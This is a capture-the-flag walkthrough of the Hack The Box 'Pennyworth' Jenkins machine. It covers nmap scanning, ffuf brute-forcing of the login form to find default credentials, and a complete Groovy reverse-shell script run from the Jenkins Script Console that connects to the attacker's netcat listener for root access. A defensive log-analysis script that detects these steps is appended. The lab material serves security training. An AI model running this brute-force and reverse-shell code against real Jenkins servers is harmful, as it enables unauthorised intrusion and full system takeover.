09.PENNYWORTH (GROOVY SCRIPTING & REVERSE SHELL)
Common Applications, Jenkins, Java, Reconnaissance, Remote Code Execution, Default Credentials
Last updated
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
8080/tcp open http Jetty 9.4.39.v20210325
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding -sC is another good way to determine service versions
- the -sC option runs the default "safe" scripts, which are designed to provide useful
information without being too intrusive or causing harm to the target systems.
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 8080
PORT STATE SERVICE VERSION
8080/tcp open http Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.39.v20210325)
| http-robots.txt: 1 disallowed entry
|_/
* the -sC option runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 8080
PORT STATE SERVICE
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
* --script=vuln runs scripts that focus specifically on detecting known
vulnerabilities in the service running on the scanned port (8080 here)
- e.g., weak configurations, or known vulnerabilities in the exposed service
- if no results are found then the service may be fully patched!
#walk the application and identify potential entry points
root@htb:~$ BROWSER > http://10.129.223.232:8080/robots.txt
# we don't want robots to click "build" links
User-agent: *
Disallow: /
root@htb:~$ BROWSER > {targetIP:port}
Welcome to Jenkins!
* possible vulnerable entry points
- login form
- could be vulnerable to brute force attacks
root@htb:~$ BROWSER > {targetSite:port}
username: null
password: null
Invalid username or password
* submit expected input
root@htb:~$ find / -iname usernames 2>/dev/null
/usr/share/seclists/Usernames
root@htb:~$ ls
top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@htb:~$ find / -iname passwords 2>/dev/null
/usr/share/seclists/Passwords
root@htb:~$ ls
500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
URL: 10.129.178.161:8080
- Forward requests until the full page is loaded
BURP > BROWSER > http://10.129.178.161:8080/login?from=%2F
Welcome to Jenkins!
Username: null
Password: null
BURP > Proxy > BROWSER
Requests
...
POST /j_spring_security_check HTTP/1.1
Host: 10.129.178.161:8080
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.178.161:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.178.161:8080/login?from=%2F
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID.9d35f114=node01hvgj3wjo0ofrnt7s0zzlo2ew0.node0
Connection: close
j_username=null&j_password=null&from=%2F&Submit=Sign+in
right-click on the "request" section > copy to file
Filename: requests.txt
File Type: All Files
root@htb:~$ nano requests.txt
...
j_username=UFUZZ&j_password=PFUZZ&from=%2F&Submit=Sign+in
* replace the username/password values with the UFUZZ/PFUZZ keyword markers so ffuf knows where to substitute each wordlist
root@htb:~$ ffuf -request requests.txt -request-proto http -mode clusterbomb -w uName.txt:UFUZZ -w pWord.txt:PFUZZ -c -fr "Invalid username or password"
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 14ms]
* PFUZZ: root
* UFUZZ: admin
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
* PFUZZ: password1
* UFUZZ: admin
root@htb:~$ ffuf -request requests.txt -request-proto http -mode clusterbomb -w uName.txt:UFUZZ -w pWord.txt:PFUZZ -c -fr "Invalid username or password" -r
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
* PFUZZ: admin1
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 96ms]
* PFUZZ: password
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
* PFUZZ: root
* UFUZZ: root
[Status: 200, Size: 17514, Words: 1111, Lines: 33, Duration: 78ms]
* PFUZZ: password1
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 88ms]
* PFUZZ: admin
* UFUZZ: root
root@htb:~$ ffuf -request requests.txt -request-proto http -mode clusterbomb -w uName.txt:UFUZZ -w pWord.txt:PFUZZ -c -fr "Invalid username or password" -r -fs 19540
* the -c flag outputs the result in color
* the -r flag follows HTTP redirects during fuzzing
* the -fs flag filters results based on content size
* the -fr flag filters results based on a regex pattern.
* the final result will contain a handful of possible credentials to use
#
root@htb:~$ nc -nlvp 8088
root@htb:~$ BROWSER > http://10.129.178.161:8080
username: root
password: password
JENKINS > Manage Jenkins > Script Console
Thread.start {
    String host = "{attackerIP}"; int port = 8088; String cmd = "/bin/bash";
    Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s = new Socket(host, port);
    InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
    OutputStream po = p.getOutputStream(), so = s.getOutputStream();
    while (!s.isClosed()) {
        while (pi.available() > 0) so.write(pi.read());
        while (pe.available() > 0) so.write(pe.read());
        while (si.available() > 0) po.write(si.read());
        so.flush(); po.flush(); Thread.sleep(50);
        try { p.exitValue(); break; } catch (Exception e) {}
    }
    p.destroy(); s.close();
}
* click the "run" button to have the target connect to the attacker's netcat server
root@htb:~$ nc -nlvp 8088   (the listener started earlier)
listening on [any] 8088 ...
connect to [10.10.14.215] from (UNKNOWN) [10.129.178.161] 51444
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
find / -iname flag.txt 2>/dev/null
/root/flag.txt
cat /root/flag.txt
9cdfb439c7876e703e307864c9167a15
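Detection-side counterpart to the login brute-force and Script Console steps above, added here as an example and not part of the original write-up: it parses constructed NCSA-style access log lines (the kind a reverse proxy or the Jetty access logger in front of Jenkins would write), flags any source that POSTs to /j_spring_security_check at least a threshold number of times inside a sliding window, and flags every POST to the script console paths (/script, /scriptText). The sample lines, the 10-request threshold and the 60-second window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample access log (NCSA combined format, as a reverse proxy or the
# Jetty access logger in front of Jenkins would write it); not a real capture.
SAMPLE_LOG = "\n".join(
    ['10.10.14.215 - - [09/Oct/2024:12:00:%02d +0000] "POST /j_spring_security_check HTTP/1.1" 302 0' % s
     for s in range(0, 24, 2)]  # 12 login POSTs in 22 seconds from one source
    + ['192.0.2.7 - - [09/Oct/2024:12:00:05 +0000] "GET /login?from=%2F HTTP/1.1" 200 17516',
       '10.10.14.215 - - [09/Oct/2024:12:01:10 +0000] "POST /script HTTP/1.1" 200 17000'])
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
LOGIN_PATH = "/j_spring_security_check"   # Jenkins form-login endpoint seen in the Burp capture above
SCRIPT_PATHS = ("/script", "/scriptText")  # Jenkins script console (HTML form and raw-text variants)

def parse(text):  # yield one event dict per well-formed line; non-matching lines are skipped
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
            ev["path"] = ev["path"].split("?", 1)[0]  # compare paths without the query string
            yield ev

def login_bursts(events, threshold=10, window=timedelta(seconds=60)):
    """Return (ip, count) for each source with >= threshold login POSTs inside any sliding window."""
    per_ip = defaultdict(list)
    for ev in events:
        if ev["method"] == "POST" and ev["path"] == LOGIN_PATH:
            per_ip[ev["ip"]].append(ev["ts"])
    hits = []
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, best = 0, 0
        for end, ts in enumerate(stamps):  # two-pointer sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits.append((ip, best))
    return hits

def script_console_use(events):
    """Return (ip, path, status) for every POST to the script console; any such hit merits an alert."""
    return [(e["ip"], e["path"], e["status"]) for e in events
            if e["method"] == "POST" and e["path"] in SCRIPT_PATHS]

def analyze(text):
    events = list(parse(text))
    return {"bruteforce": login_bursts(events), "script_console": script_console_use(events)}
```

Jenkins answers both failed and successful form logins with a 302, so the burst detector keys on request volume per source rather than on status code; a script console POST is rare enough in normal operation that a single hit is worth reviewing.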